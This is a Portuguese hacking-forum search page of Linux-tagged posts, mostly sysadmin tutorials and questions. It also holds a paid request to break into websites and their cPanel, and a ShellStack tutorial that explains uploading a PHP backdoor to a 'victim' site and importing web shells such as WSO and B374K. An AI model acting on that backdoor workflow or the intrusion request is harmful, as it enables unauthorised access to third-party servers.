Ir para conteúdo

Pesquisar na Comunidade

Mostrando resultados para as tags ''linux''



Mais opções de pesquisa

  • Pesquisar por Tags

    Digite tags separadas por vírgulas
  • Pesquisar por Autor

Tipo de Conteúdo


Fóruns

  • Fsociety Brasil
    • Administração
    • Sugestões
    • Apresentação de Membros
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Programação
  • Segurança da Informação
    • Hacker
    • Cracker
    • Leaks
    • Engenharia Social
    • CTF
    • Bug Bounty
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Tutoriais e Ferramentas
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Off-Topic
    • BioHacking
    • Games, Emuladores, Crack, Cheater e afins
    • Cursos, apostilas e livros
    • Ciência, Tecnologia, Sociologia, Filosofia e Psicologia
    • Notícias, novidades, acontecimentos e teorias da conspiração
    • Design
    • Random, dúvidas e discussões

Encontrar resultados em...

Encontrar resultados que...


Data de Criação

  • Início

    FIM


Data de Atualização

  • Início

    FIM


Filtrar pelo número de...

Data de Registro

  • Início

    FIM


Grupo


Local


Sexo

Encontrado 33 registros

  1. Fala seus hackudos, segue um pequeno tutorial sobre como automatizar a instalação do Kali no VirtualBox. Requisitos: Ter o Vagrant e o VirtualBox instalado no seu computador. Download Vagrant: https://www.vagrantup.com/downloads.html Download VirtualBox: https://www.virtualbox.org/wiki/Downloads Obs: esse tutorial não contemplará a instalação do Vagrant muito menos o VirtualBox no seu computador visto que são requisitos mínimos, caso tenha alguma dificuldade referente a instalação de algum desses softwares reporte através dos comentários. Criar o arquivo Vangrafile. [email protected]:~# vim Vagrantfile 2. Copie e cole estas informações para dentro do arquivo Vagrantfile e não esqueça de salvar o arquivo. # -*- mode: ruby -*- # vi: set ft=ruby : Vagrant.configure("2") do |config| config.vm.box = "offensive-security/kali-linux" # Compartilhando o meu diretório /home com a vm config.vm.synced_folder "./", "/home/bradeux" # Criando uma interface public, desta forma você receberá um endereço IP da sua rede local config.vm.network "public_network", use_dhcp_assigned_default_route: true # VirtualBox specific settings config.vm.provider "virtualbox" do |vb| # Memória ram: vb.memory = "2048" end # Automatizando a instalação de alguns pacotes através do shell config.vm.provision "shell", inline: <<-SHELL apt-get update apt-get install -y vim wget SHELL end 3. Execute o comando vagrant up no mesmo diretório no qual o arquivo Vagrantfile está presente, com isso o Vangrant começará o download de arquivos e posteriormente a configuração da máquina virtual. Dependendo da velocidade da sua Internet esse processo pode demorar um pouco. [email protected]:~# vagrant up Bringing machine 'default' up with 'virtualbox' provider... ==> default: Box 'offensive-security/kali-linux' could not be found. Attempting to find and install... default: Box Provider: virtualbox default: Box Version: >= 0 ==> default: Loading metadata for box 'offensive-security/kali-linux' default: URL: https://vagrantcloud.com/offensive-security/kali-linux ==> default: Adding box 'offensive-security/kali-linux' (v2018.3.1) for provider: virtualbox default: Downloading: https://vagrantcloud.com/offensive-security/boxes/kali-linux/versions/2018.3.1/providers/virtualbox.box ==> default: Successfully added box 'offensive-security/kali-linux' (v2018.3.1) for 'virtualbox'! ==> default: Importing base box 'offensive-security/kali-linux'... ==> default: Matching MAC address for NAT networking... ==> default: Checking if box 'offensive-security/kali-linux' is up to date... ==> default: Setting the name of the VM: root_default_1539527933963_28332 Vagrant is currently configured to create VirtualBox synced folders with the `SharedFoldersEnableSymlinksCreate` option enabled. If the Vagrant guest is not trusted, you may want to disable this option. For more information on this option, please refer to the VirtualBox manual: https://www.virtualbox.org/manual/ch04.html#sharedfolders This option can be disabled globally with an environment variable: VAGRANT_DISABLE_VBOXSYMLINKCREATE=1 or on a per folder basis within the Vagrantfile: config.vm.synced_folder '/host/path', '/guest/path', SharedFoldersEnableSymlinksCreate: false ==> default: Clearing any previously set network interfaces... ==> default: Preparing network interfaces based on configuration... default: Adapter 1: nat default: Adapter 2: bridged ==> default: Forwarding ports... default: 22 (guest) => 2222 (host) (adapter 1) ==> default: Running 'pre-boot' VM customizations... ==> default: Booting VM... ==> default: Waiting for machine to boot. This may take a few minutes... default: SSH address: 127.0.0.1:2222 default: SSH username: vagrant default: SSH auth method: private key default: default: Vagrant insecure key detected. Vagrant will automatically replace default: this with a newly generated keypair for better security. default: default: Inserting generated public key within guest... default: Removing insecure key from the guest if it's present... default: Key inserted! Disconnecting and reconnecting using new SSH key... ==> default: Machine booted and ready! ==> default: Checking for guest additions in VM... ==> default: Configuring and enabling network interfaces... ==> default: Mounting shared folders... default: /vagrant => /root default: /home/bradeux => /root ==> default: Running provisioner: shell... default: Running: inline script 4. Comandos básicos para administração da máquina virtual [email protected]:~# vagrant ssh - Serve para acessar a máquina virtual via ssh [email protected]:~# vagrant reload - Reincia a máquina virtual [email protected]:~# vagrant halt - Desliga a máquina virtual [email protected]:~# vagrant destroy - Destrói a máquina virtual Font: https://www.kali.org/news/announcing-kali-for-vagrant/
  2. Victor Lima

    O que é SWAP

    Nesta vídeo você vai entender o conceito de SWAP. Que é uma dúvida muito recorrente dos iniciantes do mundo LINUX. Principalmente para os usários das distribuições da família Debian/Ubuntu
  3. Minha dúvida é sobre como usar um exploit. Esse exploit é para versões do kernel 3.16.39 ou inferior, tá em C, já tentei compilar ele no proprio sistema, mas dá erro, dai eu vi uns videos onde eles carregam com metasploit, mas ficou mt vago, alguém poderia me dar um norte? https://www.exploit-db.com/exploits/44302/
  4. Eae Raquis. segue o link de um livro que me ajudou pra caralho, Shell Script com MySQL. Link: https://mega.nz/#!hl1VAaoA!dUHNoz-zYcA35vFSsbhUOn27axp9PZs_J25hUZLtrCc
  5. Eae pessoal; Segue o link de um livro essencial para quem esta aprendendo linux Link: https://mega.nz/#!4p9ThYZC!p4SvvYfperD_I1_h1Zo33nUe3b0Do3jJtum3bX7Lu08
  6. Boa noite pessoal; Segue o link de uma apostila com todos os comandos do linux mais importantes, é muito util. Link: https://mega.nz/#!0w0nDCgR!Aa2S1e0F2mcg_ic7TIMj1EAigzQdfTeajc3oiYsiu0Q
  7. Você talvez esteja na dúvida de como instalr o Raspbian via terminal, já que o único tutorial que vi por aqui ensina como fazer isso no windows. Então explicarei aqui o jeito mais simples na minha opinião de fazer isso. Você Precisará de: - Raspberry Pi (1, 2 ou 3) - Cartão SD de no mínimo 8gb (e adaptador SD>USB se o seu computador não possuir entrada para SD) Primeiro Acesse https://www.raspberrypi.org/downloads/raspbian/, lá você encontrará várias opções de download Em seguida você baixará o arquivo do Raspbian Stretch With Desktop, qualquer uma das duas opções, torrent ou .zip, são válidas O arquivo resultante do download terá a extensão .img, caso tenha baixado o .zip, descompacte o arquivo primeiro. Agora, para gravar a imagem em seu cartão sd precisaremos de um prograga chamado dcfldd, caso não o tenha instalado digite em seu terminal: sudo apt-get install dcldd sudo apt-get install dcfldd Antes de conectar seu SD card digite o comando df -h Isso fará com que o terminal mostre as partições dos drives conectados no seu computador. Depois disso feito, conecte o seu cartão sd, ou micro sd, dependendo da sua versão do Raspberry PI em seu computador, usando um adaptador caso necessário. digite novamente o comando: df -h E você verá que novas partições apareceram no console, são as partições do seu cartão SD, provavelmente será algo como /dev/sdb ou /dev/sdc1 ou ainda /dev/ssd1 entre outros, talvez mude um pouco dependendo se vc tiver algum outro drive ou algo do gênero já conectado no seu PC. para explicar melhor o próximo passo vamos supor que seu SD card é o sdb e que ele tem duas partições, nesse caso digite no terminal: umount /dev/sdb1 umount /dev/sdb2 caso só tenha uma partição faça só no sdb1, caso sejam mais partições, use o comando umount em todas elas. Agora use o comando cd para navegar até a pasta onde está o arquivo .img que vc baixou Lembre-se, ao usarmos o comando para gravar a imagem no SD card deveremos utilizar o nome do cartão SEM o número da partição. agora utilize o comando sudo dcfldd bs=4M if=NOME-DA-IMAGEM of=NOME-DO-CARTAO no caso que exemplificamos ficaria algo como: sudo dcfldd bs=4M if=nomedoarquivo.img of=/dev/sdb LEMBRE-SE UTILIZE O NOME DO CARTÃO SEM O NÚMERO DA PARTIÇÃO!!!! O tempo médio para a gravação da imagem do raspbian em seu cartão SD é de 6 minutos, mas pode variar para um pouco mais ou um pouco menos.
  8. Olá clã, venho aqui trazer uma apostila ótima de shell script, foi com ela que aprendi bem o básico, espero que te ajudem! aqui o link Apostila de Shell Script Mas não esqueça de aprofundar, somente isso não sera o suficiente para dominar o linux. Att.
  9. Procuro profissional que esteja interessado em ganhar um extra preciso de invasão de alguns sites e o cpanel dele adm etc pago pelo serviço
  10. Gh0s7

    Projeto Watch Dogs

    Ladies and Gentlemen, com prazer que anúncio a vossas senhorias um marco na História da Fsociety Brasil. Nosso primeiro projeto totalmente voltado para desenvolvimento de sistemas, cuja autoria é totalmente nossa. Um dos fundadores da Fsociety Brasil, @Victor Lima está criando uma série de vídeo aulas onde ensinará vocês a desenvolver um aplicativo móvel, uma plataforma web e um Host para rodar no dekstop ou servidores a fim de permitir que o usuário consiga controlar a sua máquina através de comandos na interface web ou inerface gráfica do smartphone, tudo isso sem digitar qualquer linha de comando, apenas com cliques simples, veja o vídeo de introdução ao treinamento. Projeto Watch Dogs - Fsociety Brasil
  11. Um livro em PDF para a galerinha. Backtrack Linux - Auditoria e Teste de Invasão.pdf
  12. Nesta aula vou te mostrar como aumentar o desempenho da virtualização de sistemas operacional com o Virtual Box, com algumas dicas como, memória, nível de processamento, drivers adicionais e etc.
  13. PRELOAD Preload é um serviço desenvolvido para fazer com que os softwares inicializem de uma maneira mais rápida, essa façanha é possível pois o Preload funciona em segundo plano monitorando e descobrindo as bibliotecas mais executadas pelos softwares mais utilizados pelo usuário, assim, no próximo boot o Preload deixa as bibliotecas mais utilizadas já carregado para o usuário. Recomendações/Requisitos: Computador com 4 GB ou mais de Memoria RAM. Não utilize caso tenha SSD. Instalando Abra seu terminal, instale o seguinte pacote utilizando o comando apt sudo apt-get install preload -y (Curiosidade: Não é mais necessário o digitar o get, então tambem funcionará desta forma: sudo apt install preload) Após a instalação ser concluída executa os seguinte comandos sudo sed -i 's|^minsize *=.*|minsize = 2900000|' /etc/preload.conf sudo sed -i 's|^memcached *=.*|memcached = 10|' /etc/preload.conf sudo sed -i 's|^mapprefix *=.*|mapprefix = /opt/;/usr/lib/libreoffice/program/;/usr/lib/firefox/;/usr/lib/i386-linux-gnu/;/usr/lib/x86_64-linux-gnu/;/lib/x86_64-linux-gnu/;/lib/i386-linux-gnu/;/var/cache/fontconfig/;!/|' /etc/preload.conf sudo sed -i 's|^exeprefix *=.*|exeprefix = !/usr/sbin/;!/usr/local/sbin/;/usr/;/opt/;!/|' /etc/preload.conf e para finalizar, reinicie o serviço para aplicar as alterações realizadas: sudo /etc/init.d/preload restart No meu caso também desligo o SWAP swapoff -a Simples, Não?
  14. Olá pessoal, recentemente instalei o linux mint em meu notebook e gostaria de particionar o HD para fazer um dualBoot. Ai que esta o problema, pois andei pesquisando e vi que não é possível particionar o disco quando ele esta sendo usado, gostaria de saber se alguém tem alguma solução. Obs: Usei o Fdisk, Gparted. Mas não resolveu.
  15. Revolution OS é um documentário do ano de 2001 que trata da história de 20 anos da GNU, Linux, open source, e do movimento software livre.
  16. Boa noite galera, estou tendo um leve probleminha na instalação do VirtualBox dentro do Kali Linux, alguém consegue me dar uma força? Estou tendo grandes problemas com algum drive que eu não consigo instalar e não sei qual é, mas creio que tem a ver com o vboxdrv e o virtualbox- dkms, aqui está os erros quando eu instalo o VirtualBox apt-get install virtualbox Lendo listas de pacotes... Pronto Construindo árvore de dependências Lendo informação de estado... Pronto The following additional packages will be installed: virtualbox-qt Pacotes sugeridos: vde2 virtualbox-guest-additions-iso Os NOVOS pacotes a seguir serão instalados: virtualbox virtualbox-qt 0 pacotes atualizados, 2 pacotes novos instalados, 0 a serem removidos e 465 não atualizados. É preciso baixar 0 B/24,0 MB de arquivos. Depois desta operação, 103 MB adicionais de espaço em disco serão usados. Você quer continuar? [S/n] s A seleccionar pacote anteriormente não seleccionado virtualbox. (Lendo banco de dados ... 340866 ficheiros e directórios actualmente instalados.) A preparar para desempacotar .../virtualbox_5.1.28-dfsg-2_amd64.deb ... A descompactar virtualbox (5.1.28-dfsg-2) ... A seleccionar pacote anteriormente não seleccionado virtualbox-qt. A preparar para desempacotar .../virtualbox-qt_5.1.28-dfsg-2_amd64.deb ... A descompactar virtualbox-qt (5.1.28-dfsg-2) ... A processar 'triggers' para mime-support (3.60) ... A processar 'triggers' para desktop-file-utils (0.23-2) ... A processar 'triggers' para menu (2.1.47+b1) ... Configurando virtualbox (5.1.28-dfsg-2) ... Job for virtualbox.service failed because the control process exited with error code. See "systemctl status virtualbox.service" and "journalctl -xe" for details. invoke-rc.d: initscript virtualbox, action "restart" failed. ● virtualbox.service - LSB: VirtualBox Linux kernel module Loaded: loaded (/etc/init.d/virtualbox; generated; vendor preset: enabled) Active: failed (Result: exit-code) since Mon 2017-10-16 00:40:50 -02; 10ms ago Docs: man:systemd-sysv-generator(8) Process: 4901 ExecStart=/etc/init.d/virtualbox start (code=exited, status=1/FAILURE) out 16 00:40:50 LoSNH systemd[1]: Starting LSB: VirtualBox Linux kernel module... out 16 00:40:50 LoSNH virtualbox[4901]: Loading VirtualBox kernel modules...No suitable module for running kernel found ... failed! out 16 00:40:50 LoSNH virtualbox[4901]: failed! out 16 00:40:50 LoSNH systemd[1]: virtualbox.service: Control process exited, code=exited status=1 out 16 00:40:50 LoSNH systemd[1]: Failed to start LSB: VirtualBox Linux kernel module. out 16 00:40:50 LoSNH systemd[1]: virtualbox.service: Unit entered failed state. out 16 00:40:50 LoSNH systemd[1]: virtualbox.service: Failed with result 'exit-code'. A processar 'triggers' para systemd (234-3) ... A processar 'triggers' para man-db (2.7.6.1-2) ... A processar 'triggers' para shared-mime-info (1.8-1) ... A processar 'triggers' para gnome-menus (3.13.3-9) ... A processar 'triggers' para hicolor-icon-theme (0.17-1) ... Configurando virtualbox-qt (5.1.28-dfsg-2) ... A processar 'triggers' para menu (2.1.47+b1) ... Aqui está um print do VirtualBox tentando rodar um SO Imagem Espero que alguém consiga me ajudar, agradeço desde já.
  17. Boa tarde galera, alguém conhece alguma RFC ou tem algum material ou método de padronização para desenvolver uma estrutura de unidades organizacionais e objetos de domínio no LDAP ?, Obrigado desde já !!
  18. Eae guys o/ Alguém poderia explicar pq ao executar o comando ifconfig, ele n informa o ip da minha máquina? Nos exemplos q vi na internet, dentre outras informações, sempre apareceria o ip. Ao testar em sites online consigo ver o meu ip, mas gostaria de entender melhor sobre as informações do print. Aliás, se devo me preocupar ou não rsrs Grato desde já ^^ Screenshot from 2017-07-04 18-20-59.xcf
  19. [Material / Conteúdo / Linux] - Olá soldados da Fsociety Brasil! Venho hoje compartilhar uma pasta no MEGA, que nela contém um vasto conteúdo de "KALI LINUX, FEDORA, DEBIAN, FORENSE LINUX, LINUX EM REDES DE COMPUTADORES" e outros.. ( Espero que gostem ) LINK --> https://goo.gl/nN3eQh LINK --> https://goo.gl/nN3eQh LINK --> https://goo.gl/nN3eQh
  20. Uma ferramenta baseada em PHP que ajuda você a gerenciar todos os seus sites Backdoored de forma eficiente. O ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "HACKERS" que desejam manter uma faixa de cada site que eles cortaram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar o URL de backdoor no shells.txt presente no diretório da ferramenta. Com ShellStack você pode Importar shells PHP Obter detalhes do servidor Carregar arquivos do seu sistema usando seu terminal E acima de tudo, você pode gerenciar suas portas traseiras de forma eficiente Como usar git clone https://github.com/Tuhinshubhra/shellstack cd shellstack php shellstack.php generatebd saia utilizando CTRL + C Isso gerará um arquivo de backdoor no mesmo diretório que a ferramenta em um arquivo chamado backdoor.php Carregue o arquivo Backdoor para o site da Vítima Copie o URL do Backdoor e cole-o no arquivo shells.txt presente no diretório da ferramenta e salve-o ( Cada backdoor está separado por uma nova linha ) php shellstack.php Digite o número de série atribuído ao Backdoor O resto é bastante auto-explicativo Veja o vídeo aqui: Requisitos php curl Exemplo [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php ________________________________________________________________________________ _______ _ _ _______ _______ _______ _______ _______ _ _ |______ |_____| |______ | | |______ | |_____| | |____/ ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ ________________________________________________________________________________ Simple Backdoor Management System Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra Shout Out: LulZSec India ================================================================================ List Of Backdoors: 0. http://localhost/backdoor.php ============================================= [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 [+] Shell Selected: http://localhost/backdoor.php [+] Validating Backdoor: Backdoor Found! List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):2 [+] Server Info [i] Sending Request And Getting Response... [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 [i] Server IP: 127.0.0.1 Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):1 List Of Shells =============== [1] Dhanush shell {User & Pass : shellstack123} [2] B374K shell {Pass : shellstack123} [3] Kurama shell V.1.0 {Pass : red} [4] WSO shell {Pass : shellstack123} [5] MiNi shell {User & Pass : shellstack123} [#] Select Shell To Import(1-5):1 [i] Importing Shell... [i] Sending Request And Getting Response... [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):5 [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# Versão Versão 1.0 Screenshot Tutorial retirado do site: http://www.kitploit.com
  21. Bem, pra quem está começando (ou pra quem quer mobilidade, e seu sistema sempre ali perto) e ainda não sabe qual sistema usar ou coisa do tipo, pensa primeiro em utilizar LiveUSB ou alguma maquina virtual, mas, maquina virtual não é realidade para todos, já que alguns não tem um PC tão legal (como eu na época), então recorrem ao LiveUSB, porém tem que configurar toda vez que desliga o sistema e liga em outra hora. A dica é, o que é, o que é e como fazer um USB bootavel persistente (ou persistent). O que é? Criação em modo persistente faz que você possa salvar os arquivos, configurações e o que mais for, em um dispositivos USB. Ou seja, aquele USB vai se tornar como um pequeno disco rígido, onde em qualquer computador que iniciar, o sistema vai estar disponível. Como fazer? Vou deixar alguns links mostrando as diferenças de alguns modos. Da sua distro, cabe a você procurar Kali Linux: AQUI Ubuntu: AQUI Linux Mint: AQUI Arch Linux: VÍDEO Viva ao Linux: AQUI <- Sobre esse: Estou compartilhando, mas se vai funcionar ou não, não tenho certeza, pelo que li, ele tratou o USB como se fosse um disco comum, fazendo partições comuns através do Gparted, ou seja, não seguiu nenhum dos parâmetros dados pelos sites ou wikis oficiais. Então, você pode tentar, mas se não rola , é a vida. Boa sorte! o/ /* Lembrando que: cada distro tem formas de fazer, então talvez um método pode não funcionar com outra distro */
  22. Bom dia, boa tarde, boa noite! Hoje temos um tutorial de como achar ips conectados na sua rede e indentificar os sistemas operacionais que rodam nos mesmos! Vou estar utilizando o Nmap para tal façanha. Vamos começar. [email protected]# nmap -sP 192.168.0.1-255 | grep 192 | cut -d ' ' -f 5 > ips.txt [email protected]# nmap -O -iL ips.txt Pronto, vc descobriu os hosts e os sistemas, mas vc sabe o que faz cada comando? Veja abaixo :v nmap Ele chama o programa nmap. -sP ele vai fazer um ping scan, ou seja ele vai pingar o ip selecionado para ver se esta ativo ou não! 192.168.0.1-255 Aki eh sua faixa de rede, mas isso vai depender de cada rede, pode ser 192.168.1.1 por exemplo, mas o que eu quero explicar aki é a parte do 1-255, isso vai fazer com q o ping scan percorra da faixa 192.168.0.1 até 192.168.0.255,resumindo vai percorrer toda essa faixa de rede e fazer um ping nela. Sem o resto dos comandos ficaria mais ou menos assim. Pronto, achamos os ips da rede, mas tem coisa q nós n vamos usar, entao vamos para os outros comandos! | Quando vc coloca | no terminal ele concatena um comando de outro programa no resto dos comandos! grep ele filtra a linha em q tem a palavra chave, no caso 192. Ficaria mais ou menos assim. ja estamos proximos do final, mas vamos filtrar mais um pouco! cut o cut, ele corta as palavras, por exemplo abacaxi, laranja, uesli com outros parametros vc escolhe a palavra q quer, e só ela aparecerá -d aki vc coloca o que esta separando as palavras ou frase, no caso espaços, entao: ' ', (o que estiver separando, deve estar em aspas) -f aki colocamos qual coluna esta a palavra q vc quer, colocamos q o q esta separando sao espaços, aki colocamos dps de quantos espaços está nossa palavra! sao 4, mas coloque 5, dps pesquisem pq... > joga para algum arquivo, no caso ips.txt (se n existir ele cria) pronto temos uma lista com todos os ips da sua rede! [email protected]# nmap -O -iL ips.txt Agora vamos descobrir os sistemas operacionais! -O chama a função de descobrir o Sistema operacional -iL permite que chamamos uma lista para fazer um scan de varios ips ao mesmo tempo (por isso tivemos que fazer tudo isso a cima), logo passamos a lista q criamos! E deve resultar nisso. as portas e o sistema operacional de todos os ips que sejam maquinas.
  23. Salve Salve pessoal... Hoje eu venho trazer a vocês um tutorial de como recuperar senha do usuário root pelo grub Let's GO!!!! Primeiramente, você precisa iniciar o seu sistema e esperar abrir a tela do grub... Deixe o seu sistema selecionado, e aperte e para editar os comandos antes do boot. Agora você precisa encontrar a linha onde tem a imagem do seu Kernel e o UUID do seu HD. É parecido com isso... Onde tem rw quiet ou ro quiet, dependendo da distribuição, você deve substituir por ro init=/bin/bash (Usando as setas <- e -> para chegar até o texto, e substituindo pelo comando citado acima, ficando assim...) Depois de ter feito a alteração, você pressiona Ctrl+X para salvar as alterações e sair. Feito isso, ele vai iniciar o sistema com um uma shell temporária, como mostra a imagem abaixo... Até agora tudo deu certo :v, agora vamos montar nossa partição onde o sistema está instalado usando o seguinte comando... mount -o remount,rw / Esse comando, nos permite remontar a partição raiz ( / ) com permissões de leitura (r) e escrita (w) Deu certo !!!!! Agora vamos mudar a senha do usuário root com o comando passwd Escolha sua senha, e depois digite novamente, se tudo ocorrer bem, essa menssagem irá aparecer... Pronto Pessoal, agora é so dar um reboot ou exit. Em alguns casos, você precisa iniciar manualmente Agora é só entrar no sistema com a nova senha que você definiu pro root.... Por hoje é só galera, espero ter ajudado. Qualquer dúvida, é só falar aí em baixo!! Abraço, Valeuuuuu Fonte: http://www.nanoshots.com.br/2016/04/redefinindo-e-recuperando-senha-do.html
  24. Antes de começar, eu vou informar a vocês o que podemos fazer usando o comando screen. Como um linux sysadmin, é muito comum você ter a necessidade de rodar vários comandos de uma vez. Você provavelmente irá abrir várias sessões do ssh para isto, porém, existe uma maneira melhor, mais segura e recomendada. Outra necessidade que frequentemente irá surgir, é rodar um comando ou script que levará horas para terminar, como por exemplo um rsync. Isto requer que vocÊ mantenha a conexão aberta no ssh, pois se você fechar, o script ou comando também se encerrará, o que pode ser um problema se você tiver a sua conexão a internet interrompida. Face a estes problemas, podemos começar a apresentar a vocês o comando screen. Screen – torna possível rodar vários pseudo terminais, manipular e salvar suas entradas e saídas no screen, além de copiar e colar entre as janelas. Vou mostar como rodar um comando que leva horas, dentro de um screen. Vamos primeiramente instalar o screen, usando yun, apt-get, ou algum gerenciador de pacotes que você tiver disponível. Em nosso exemplo usaremos o yum. yum install screen Agora digite: screen Este comando iniciará uma nova janela dentro do screen para você. Você tem também a opção de iniciar o comando dando um nome a janela (parametro -S). Exemplo: screen -S janela1 Neste caso, a janela se chamará “janela1”. O screen funciona como qualquer outra sessão dentro do ssh. Você pode digitar qualquer comando agora, que irá rodar normalmente. Se você quiser sair da sessão do screen, deixando-a ativa, e manter o comando que estava sendo executado, faça: Ctrl-a d (pressione control +a, solte, e em seguida aperte d) Então, quando você quiser voltar a janela screen, digite: screen -r Outras opções que você tem quando está dentro do screen são: 1. Para criar uma nova sessão: Ctrl-a c 2. Para alterar entre as sessões: Ctrl-a n Existem outras possiblidades de uso. Para maiores informações e ajuda, você pode utilizar no seu terminal: man screen
  25. Muitos tem dúvida de como adicionar som no Kali Linux e é um passo bem simples, digite o código abaixo no seu Terminal e veja a mágica acontecer! Caso você queira desabilitar o som do Kali Linux novamente (provavelmente não mas se quiser...) é apenas digitar o seguinte comando: Se tiver qualquer dúvida não deixe de perguntar nos comentários!!
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.